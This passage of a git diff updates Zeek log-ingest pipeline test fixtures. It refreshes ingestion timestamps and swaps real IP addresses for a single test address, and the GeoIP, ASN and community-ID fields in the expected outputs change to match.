b/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json @@ -32,7 +32,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:33.839619700Z", + "ingested": "2021-12-09T13:51:07.328453Z", "original": "{\"ts\":1507565599.578328,\"id\":\"FtIFnm3ZqI1s96P74l\",\"machine\":\"I386\",\"compile_ts\":1467139314.0,\"os\":\"Windows XP\",\"subsystem\":\"WINDOWS_CUI\",\"is_exe\":true,\"is_64bit\":false,\"uses_aslr\":true,\"uses_dep\":true,\"uses_code_integrity\":false,\"uses_seh\":true,\"has_import_table\":true,\"has_export_table\":false,\"has_cert_table\":true,\"has_debug_data\":false,\"section_names\":[\".text\",\".rdata\",\".data\",\".rsrc\",\".reloc\"]}", "category": [ "file" @@ -87,7 +87,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:33.839668500Z", + "ingested": "2021-12-09T13:51:07.328459900Z", "original": "{\"ts\":1507565599.578328,\"id\":\"FtIFnm3ZqI1s96P74l\",\"machine\":\"I386\",\"compile_ts\":1467139314.0,\"os\":\"Windows XP\",\"subsystem\":\"WINDOWS_CUI\",\"is_exe\":true,\"is_64bit\":false,\"uses_aslr\":true,\"uses_dep\":true,\"uses_code_integrity\":false,\"uses_seh\":true,\"has_import_table\":true,\"has_export_table\":false,\"has_cert_table\":true,\"has_debug_data\":false,\"section_names\":[\".text\",\".rdata\",\".data\",\".rsrc\",\".reloc\"]}", "category": [ "file" diff --git a/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json b/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json index 702a2459b58..64282c8e9aa 100644 --- a/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json +++ b/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json @@ -41,7 +41,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:34.144226700Z", + "ingested": "2021-12-09T13:51:07.578196900Z", "original": "{\"ts\":1217631137.916736,\"uid\":\"CRe9VD3flCDWbPmpIh\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":1645,\"id.resp_h\":\"10.0.0.100\",\"id.resp_p\":1812,\"username\":\"John.McGuirk\",\"mac\":\"00:14:22:e9:54:5e\",\"result\":\"success\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -109,7 +109,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:34.144237500Z", + "ingested": "2021-12-09T13:51:07.578205400Z", "original": "{\"ts\":1217631137.916736,\"uid\":\"CRe9VD3flCDWbPmpIh\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":1645,\"id.resp_h\":\"10.0.0.100\",\"id.resp_p\":1812,\"username\":\"John.McGuirk\",\"mac\":\"00:14:22:e9:54:5e\",\"result\":\"success\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json b/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json index ab93f171198..03bd4ffb157 100644 --- a/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json +++ b/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json @@ -44,7 +44,7 @@ "established": true }, "event": { - "ingested": "2021-08-11T19:18:34.597592900Z", + "ingested": "2021-12-09T13:51:07.959730500Z", "original": "{\"ts\":1568132339.668952,\"uid\":\"C2PcYV7D3ntaHm056\",\"id.orig_h\":\"192.168.131.1\",\"id.orig_p\":33872,\"id.resp_h\":\"192.168.131.131\",\"id.resp_p\":3389,\"result\":\"encrypted\",\"security_protocol\":\"HYBRID\",\"cert_count\":0,\"ssl\":true}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -110,7 +110,7 @@ "established": true }, "event": { - "ingested": "2021-08-11T19:18:34.597602900Z", + "ingested": "2021-12-09T13:51:07.959740Z", "original": "{\"ts\":1568132339.668952,\"uid\":\"C2PcYV7D3ntaHm056\",\"id.orig_h\":\"192.168.131.1\",\"id.orig_p\":33872,\"id.resp_h\":\"192.168.131.131\",\"id.resp_p\":3389,\"result\":\"encrypted\",\"security_protocol\":\"HYBRID\",\"cert_count\":0,\"ssl\":true}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json b/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json index 107f26d57f4..833175657c7 100644 --- a/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json +++ b/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json @@ -45,7 +45,7 @@ "ip": "192.168.1.123" }, "event": { - "ingested": "2021-08-11T19:18:35.038675300Z", + "ingested": "2021-12-09T13:51:08.328387900Z", "original": "{\"ts\":1328632534.517208,\"uid\":\"CXoIzM3wH3fUwXtKN1\",\"id.orig_h\":\"192.168.1.123\",\"id.orig_p\":58102,\"id.resp_h\":\"192.168.1.10\",\"id.resp_p\":5900,\"client_major_version\":\"003\",\"client_minor_version\":\"008\",\"server_major_version\":\"003\",\"server_minor_version\":\"008\",\"authentication_method\":\"VNC\",\"auth\":true,\"share_flag\":false,\"desktop_name\":\"\\u00a0\",\"width\":800,\"height\":600}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -128,7 +128,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:35.038790900Z", + "ingested": "2021-12-09T13:51:08.328393600Z", "original": "{\"ts\":1328632534.517208,\"uid\":\"CXoIzM3wH3fUwXtKN1\",\"id.orig_h\":\"192.168.1.123\",\"id.orig_p\":58102,\"id.resp_h\":\"192.168.1.10\",\"id.resp_p\":5900,\"client_major_version\":\"003\",\"client_minor_version\":\"008\",\"server_major_version\":\"003\",\"server_minor_version\":\"008\",\"authentication_method\":\"VNC\",\"auth\":true,\"share_flag\":false,\"desktop_name\":\"\\u00a0\",\"width\":800,\"height\":600}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log index 4725117d90e..3254e9e084e 100644 --- a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log +++ b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log @@ -1 +1 @@ -{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "124.51.137.154","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "124.51.137.154: TCP traffic","sub_msg": ""} +{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "89.160.20.156","src_port": 51617,"dst_addr": "89.160.20.156","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "89.160.20.156: TCP traffic","sub_msg": ""} diff --git a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json index 9850d1fc4b4..84863c54ea1 100644 --- a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json +++ b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json @@ -4,22 +4,25 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Czechia", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 14.4112, - "lat": 50.0848 - }, - "country_iso_code": "CZ" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 5610, + "number": 29518, "organization": { - "name": "O2 Czech Republic, a.s." + "name": "Bredband2 AB" } }, - "address": "160.218.27.63", + "address": "89.160.20.156", "port": 445, - "ip": "160.218.27.63" + "ip": "89.160.20.156" }, "zeek": { "signature": { @@ -29,31 +32,31 @@ "session_id": "CbjAXE4CBxJ8W7VoJg" }, "rule": { - "description": "124.51.137.154: TCP traffic", + "description": "89.160.20.156: TCP traffic", "id": "my-second-sig" }, "source": { "geo": { - "continent_name": "Asia", - "region_iso_code": "KR-26", - "city_name": "Busan", - "country_iso_code": "KR", - "country_name": "South Korea", - "region_name": "Busan", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 129.0442, - "lat": 35.1003 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 17858, + "number": 29518, "organization": { - "name": "LG POWERCOMM" + "name": "Bredband2 AB" } }, - "address": "124.51.137.154", + "address": "89.160.20.156", "port": 51617, - "ip": "124.51.137.154" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -67,13 +70,12 @@ }, "related": { "ip": [ - "124.51.137.154", - "160.218.27.63" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-26T12:37:15.323536262Z", - "original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"124.51.137.154\",\"src_port\": 51617,\"dst_addr\": \"160.218.27.63\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"124.51.137.154: TCP traffic\",\"sub_msg\": \"\"}", + "ingested": "2021-12-09T13:51:08.678071800Z", + "original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"89.160.20.156\",\"src_port\": 51617,\"dst_addr\": \"89.160.20.156\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"89.160.20.156: TCP traffic\",\"sub_msg\": \"\"}", "id": "CbjAXE4CBxJ8W7VoJg", "category": "network", "created": "2020-04-28T11:07:58.223Z", diff --git a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log index 1e9cc81643d..31694b9c500 100644 --- a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log +++ b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log @@ -1,6 +1,6 @@ -{"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"74.63.41.218","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 ","request_to":"","response_from":"\u0022AppNeta\u0022 ","response_to":";tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0} -{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"200.57.7.204","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 ","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@200.57.7.195","seq":"1 INVITE","request_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"response_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061","SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0} -{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"200.57.7.205","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 200.57.7.205:5061;rport"],"response_path":["SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061"],"user_agent":"Verso Softphone release 1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0} -{"ts":1617119416.928735,"uid":"CR6XQH1Lf2mF9YG7H2","id.orig_h":"193.107.216.13","id.orig_p":5083,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@35.198.74.222","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"767538559354206383610151","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 193.107.216.13:5083"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} -{"ts":1617119923.416653,"uid":"Cf9QMt4ear7ZkX74ti","id.orig_h":"45.134.144.100","id.orig_p":5170,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@35.198.74.222","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"35848812076538877174452","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 127.0.0.1:5170"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"200.57.7.205\",\"id.orig_p\":5061,\"id.resp_h\":\"200.57.7.195\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \",\"request_to\":\"Ivan \",\"response_from\":\"\\u0022Ivan\\u0022 \",\"response_to\":\"\\u0022Ivan\\u0022 \",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/sip.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 ","request_to":"","response_from":"\u0022AppNeta\u0022 ","response_to":";tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0} +{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"89.160.20.156","id.orig_p":5061,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 ","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@89.160.20.156","seq":"1 INVITE","request_path":["SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061"],"response_path":["SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061","SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0} +{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"89.160.20.156","id.orig_p":5061,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 89.160.20.156:5061;rport"],"response_path":["SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061"],"user_agent":"Verso Softphone release 1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0} +{"ts":1617119416.928735,"uid":"CR6XQH1Lf2mF9YG7H2","id.orig_h":"89.160.20.156","id.orig_p":5083,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@89.160.20.156","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"767538559354206383610151","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 89.160.20.156:5083"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} +{"ts":1617119923.416653,"uid":"Cf9QMt4ear7ZkX74ti","id.orig_h":"89.160.20.156","id.orig_p":5170,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@89.160.20.156","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"35848812076538877174452","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 127.0.0.1:5170"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \",\"request_to\":\"Ivan \",\"response_from\":\"\\u0022Ivan\\u0022 \",\"response_to\":\"\\u0022Ivan\\u0022 \",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/sip.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json index f3d8141dd87..8ee74f2db18 100644 --- a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json +++ b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json @@ -3,23 +3,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 29791, + "number": 29518, "organization": { - "name": "Internap Corporation" + "name": "Bredband2 AB" } }, - "address": "74.63.41.218", + "address": "89.160.20.156", "port": 5060, - "ip": "74.63.41.218" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CPRLCB4eWHdjP852Bk", @@ -67,7 +70,7 @@ ], "network": { "protocol": "sip", - "community_id": "1:t8Jl0amIXPHemzxKgsLjtkB+ewo=", + "community_id": "1:qeURsPuZXF8ataWohrLnhZFa7/c=", "transport": "udp" }, "@timestamp": "2013-02-26T22:02:39.055Z", @@ -77,12 +80,12 @@ "related": { "ip": [ "172.16.133.19", - "74.63.41.218" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:35.589887400Z", - "original": "{\"ts\":1361916159.055464,\"uid\":\"CPRLCB4eWHdjP852Bk\",\"id.orig_h\":\"172.16.133.19\",\"id.orig_p\":5060,\"id.resp_h\":\"74.63.41.218\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:newyork.voip.ms:5060\",\"request_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"request_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e;tag=as023f66a5\",\"call_id\":\"8694cd7e-976e4fc3-d76f6e38@172.16.133.19\",\"seq\":\"4127 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"response_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"user_agent\":\"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267\",\"status_code\":401,\"status_msg\":\"Unauthorized\",\"request_body_len\":0,\"response_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041817900Z", + "original": "{\"ts\":1361916159.055464,\"uid\":\"CPRLCB4eWHdjP852Bk\",\"id.orig_h\":\"172.16.133.19\",\"id.orig_p\":5060,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:newyork.voip.ms:5060\",\"request_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"request_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e;tag=as023f66a5\",\"call_id\":\"8694cd7e-976e4fc3-d76f6e38@172.16.133.19\",\"seq\":\"4127 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"response_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"user_agent\":\"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267\",\"status_code\":401,\"status_msg\":\"Unauthorized\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "REGISTER", @@ -101,36 +104,36 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.195", + "address": "89.160.20.156", "port": 5060, - "ip": "200.57.7.195" + "ip": "89.160.20.156" }, "zeek": { "session_id": "ComJz236lSOcuOmix3", "sip": { "request": { "path": [ - "SIP/2.0/UDP 200.57.7.195", - "SIP/2.0/UDP 200.57.7.195:55061" + "SIP/2.0/UDP 89.160.20.156", + "SIP/2.0/UDP 89.160.20.156:55061" ], - "from": "\u003csip:200.57.7.195:55061;user=phone\u003e", + "from": "\u003csip:89.160.20.156:55061;user=phone\u003e", "to": "\"francisco@bestel.com\" \u003csip:francisco@bestel.com:55060\u003e", "body_length": 229 }, @@ -140,18 +143,18 @@ }, "response": { "path": [ - "SIP/2.0/UDP 200.57.7.195", - "SIP/2.0/UDP 200.57.7.195:55061", - "SIP/2.0/UDP 200.57.7.195", - "SIP/2.0/UDP 200.57.7.195:55061" + "SIP/2.0/UDP 89.160.20.156", + "SIP/2.0/UDP 89.160.20.156:55061", + "SIP/2.0/UDP 89.160.20.156", + "SIP/2.0/UDP 89.160.20.156:55061" ], - "from": "\u003csip:200.57.7.195:55061;user=phone\u003e", + "from": "\u003csip:89.160.20.156:55061;user=phone\u003e", "to": "\"francisco@bestel.com\" \u003csip:francisco@bestel.com:55060\u003e;tag=298852044", "body_length": 0 }, "uri": "sip:francisco@bestel.com:55060", "transaction_depth": 0, - "call_id": "12013223@200.57.7.195", + "call_id": "12013223@89.160.20.156", "status": { "msg": "Ringing", "code": 180 @@ -160,26 +163,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.204", + "address": "89.160.20.156", "port": 5061, - "ip": "200.57.7.204" + "ip": "89.160.20.156" }, "url": { "full": "sip:francisco@bestel.com:55060" @@ -189,7 +192,7 @@ ], "network": { "protocol": "sip", - "community_id": "1:U/Makwsc8lm6pVKLfRMzoNTI++0=", + "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", "transport": "udp" }, "@timestamp": "2005-01-14T17:58:02.965Z", @@ -198,13 +201,12 @@ }, "related": { "ip": [ - "200.57.7.204", - "200.57.7.195" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:35.589901300Z", - "original": "{\"ts\":1105725482.965944,\"uid\":\"ComJz236lSOcuOmix3\",\"id.orig_h\":\"200.57.7.204\",\"id.orig_p\":5061,\"id.resp_h\":\"200.57.7.195\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"INVITE\",\"uri\":\"sip:francisco@bestel.com:55060\",\"request_from\":\"\u003csip:200.57.7.195:55061;user=phone\u003e\",\"request_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e\",\"response_from\":\"\u003csip:200.57.7.195:55061;user=phone\u003e\",\"response_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e;tag=298852044\",\"call_id\":\"12013223@200.57.7.195\",\"seq\":\"1 INVITE\",\"request_path\":[\"SIP/2.0/UDP 200.57.7.195\",\"SIP/2.0/UDP 200.57.7.195:55061\"],\"response_path\":[\"SIP/2.0/UDP 200.57.7.195\",\"SIP/2.0/UDP 200.57.7.195:55061\",\"SIP/2.0/UDP 200.57.7.195\",\"SIP/2.0/UDP 200.57.7.195:55061\"],\"status_code\":180,\"status_msg\":\"Ringing\",\"request_body_len\":229,\"response_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041826300Z", + "original": "{\"ts\":1105725482.965944,\"uid\":\"ComJz236lSOcuOmix3\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"INVITE\",\"uri\":\"sip:francisco@bestel.com:55060\",\"request_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"request_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e\",\"response_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"response_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e;tag=298852044\",\"call_id\":\"12013223@89.160.20.156\",\"seq\":\"1 INVITE\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\",\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"status_code\":180,\"status_msg\":\"Ringing\",\"request_body_len\":229,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "INVITE", @@ -222,33 +224,33 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + 